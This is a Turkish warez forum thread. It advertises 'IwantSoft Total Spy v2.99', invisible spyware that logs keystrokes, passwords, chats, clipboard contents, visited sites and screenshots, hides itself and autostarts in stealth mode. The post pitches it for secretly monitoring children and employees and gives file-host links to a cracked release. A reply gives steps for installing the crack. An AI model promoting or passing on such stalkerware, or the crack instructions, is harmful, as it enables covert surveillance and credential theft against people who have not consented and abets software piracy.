Jump to content

Iwantsoft Total Spy V2.99


semsibey
 Share

Recommended Posts

  • Editor
[center][b][font="Comic Sans MS"][size="4"][color="#ff0000"]IwantSoft Total Spy[/color][/size][/font][size="3"][color="#0000ff"] v2.99[/color] 1.03 MB[/size][/b][/center]
[center][color="#8b0000"]Bilgisayarınızda olan biten herşeyi görün, çocuklarınız, çalışanlarınız kontrolden çıkmasın.[/color][/center]
[center]ss[spoiler][img]http://www.iwantsoft.com/screenshots/TotalSpy.gif[/img][img]http://www.iwantsoft.com/screenshots/TotalSpy2.PNG[/img][/center][center][img]http://www.iwantsoft.com/screenshots/TotalSpy4.PNG[/img][/spoiler][/center][center]
[/center]
[b]Total Spy all-in-one görünmez casus yazılım.[/b]
Anahtar günlüğü, şifreler ve sohbetlerin izlenmesi, ekran kayıt sağlar. Monitör web navigasyon. Gizli gözetim ve PC aktivite izleme için tasarlanmıştır. Bu program ile diğer kullanıcılara bir bilgisayarda ne yaptığını biliyor.

Total Spy kayıt tuş vuruşlarını (parolalar, e-postalar, sohbetler, belgeler vb. Dahil olmak üzere), değişiklikler için panoya tarar, web navigasyon izler. Ayrıca, gizlice ekran yapar, bu yüzden tam olarak diğer kullanıcıların ne yaptığını görebilirsiniz. Total Spy Sonra, bir sabit diskte gizli raporlar kayıtlı tüm bilgiler toplar, böylece daha sonra görebilirsiniz. Bu program dışında herkes için görünmez. Sadece görünür kılmak için özel bir kısayol tuşuna basın.

[b]Anahtar özellikler:[/b]
* Kesinlikle hariç herkes görünmez. Total Spy görünür kılmak için sadece sıcak tuşuna basın;
* Yakaladığını, klavyeden girilen her şeyi;
* Tüm internet navigasyon (ziyaret edilen URL'leri ve web sitesi başlıkları) izler;
* Değişiklikler için Windows panoya tarar;
* Ekran monitörler. Bilgisayar kullanıcı gördüğünüz her şeyi görebilirsiniz;
* Gizli modunda autostart. Her sistem yeniden başlatıldıktan sonra elle Total Spy gizlemek zorunda değilsiniz.

[b]Çocuklarınız var mı? [/b]Total Spy ile, tehlikeli kişileri onları korumak. Çevrimiçi sohbet ve e-postalarınızı okuyabilirsiniz. Ayrıca, ziyaret edilen web siteleri izleyebilirsiniz. Ve tereddüt etmeyin! BİR VELİ İSEN, çünkü bilmek hakkına sahiptir.

[b]Bir patron musunuz?[/b] Tüm çalışanların sadece işiniz için onların bilgisayar kaynakları ve Internet bağlantısı kullanıyor musunuz? Onlar kadar çok çalışır, onların omuzları üzerinden izlerken zaman yaptığınız gibi uzakta olduğunuzda mı? Çalışanın verimliliğini eksiktir kuşkulanıyor musunuz? Total Spy yardımcı olabilir. Sadece kendi bilgisayarlarına yüklemek ve LAN üzerinden herhangi bir casus raporları görebilirsiniz. Sadece kendi bilgisayarlarında aşağıdaki klasörleri açın. Tabii ki, bu ağ üzerinde yönetici haklarıyla sahip olması gerekir.

[b]Yazarak Kayıp?[/b] Bilgisayarınızın aniden kilitlendi ve uygulamayı kapatmak zorunda kaldınız, metin editörü yazdığınız veriyi kaç kez kaydetti? Total Spy çalışırken, gün boyunca yazdığınız metni yeniden kazanmak için mümkün olacak!

Total Spy dünyanın en güçlü casus yazılım. Bizim yazılımı kullanarak herhangi bir şifre, e-postalar, konuşmalar, belgeler, internet navigasyon gibi keşfedebilirsiniz.




[code]
http://www.filesonic.com/file/D4Pp5bp
http://www.wupload.com/file/2649616962
http://depositfiles.com/files/1g9kzv0l9/IwantSoft.Total.Spy.v2.99-LAXiTY.rar[/code] Edited by semsibey
Link to comment
Share on other sites

  • Editor

[quote name='zng' date='24 January 2012 - 23:10 ' timestamp='1327439431' post='1145397']
crack full yapamadı
[/quote]

[b]ts-setup.exe[/b] ile kurulumu tamamladıktan sonra [b]crack_tsmon.zip[/b] içindeki .exe yi Program files teki dizine kopyalamanız gerek..
Bu sırada Görev yöneticisinden kurduğunuz exe'nin çalışmadığını kontrol etmelisiniz; eğer çalışıyorsa kapatıp tekrar deneyin.
İçindeki [b]latixy.nfo[/b]'yu bir okuyun.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...